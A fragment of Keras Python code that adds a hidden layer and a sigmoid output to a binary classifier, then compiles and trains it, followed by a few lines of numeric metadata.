# We add a vanilla hidden layer:
model.add(Dense(hidden_dims))
model.add(Dropout(0.2))
model.add(Activation('relu'))

# We project onto a single unit output layer, and squash it with a sigmoid:
model.add(Dense(1))
model.add(Activation('sigmoid'))

model.compile(loss='binary_crossentropy',
              optimizer='adam',
              metrics=['accuracy'])
model.fit(x_train, y_train,
          batch_size=batch_size,
          epochs=epochs,
          validation_data=(x_test, y_test))
31.643243
112
0.656389
2,020
0.172532
0
0
0
0
0
0
2,902
0.247865